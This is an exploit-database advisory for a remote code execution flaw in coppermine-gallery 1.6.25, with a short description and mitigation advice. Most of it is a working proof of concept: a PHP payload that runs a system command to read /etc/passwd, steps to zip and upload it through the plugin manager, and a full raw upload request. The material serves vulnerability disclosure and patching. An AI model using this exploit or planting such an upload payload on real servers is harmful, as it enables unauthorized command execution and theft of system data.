coppermine-gallery 1.6.25 RCE

vendor:

coppermine-gallery

by:

Mirabbas Ağalarov

6.1

CVSS

HIGH

RCE

CWE

Product Name: coppermine-gallery

Affected Version From: v1.6.25

Affected Version To:

Patch Exists: YES

Related CWE:

CPE: a:coppermine-gallery:coppermine-gallery:1.6.25

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

coppermine-gallery 1.6.25 RCE

The coppermine-gallery version 1.6.25 is vulnerable to Remote Code Execution (RCE) attack. By uploading a specially crafted zip file containing a PHP file with malicious code, an attacker can execute arbitrary commands on the server. This can lead to unauthorized access, data leakage, and potential compromise of the entire system.

Mitigation:

Update to a patched version of coppermine-gallery (v1.6.26 or later) that addresses this vulnerability. Ensure that file uploads are properly validated and sanitized. Regularly monitor for any unauthorized file uploads or suspicious activities on the server.

Source

Exploit-DB raw data:

Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25  
Bugs:  RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date of found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps


1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.
$ cat >> test.php 
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php

1. Login to account
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
3. Upload zip file
4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.php



poc request

POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close

------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip

PK
�����b%Wz½µ}(���(�����test.phpUT	�ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>
PK
�����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"

50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"

1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--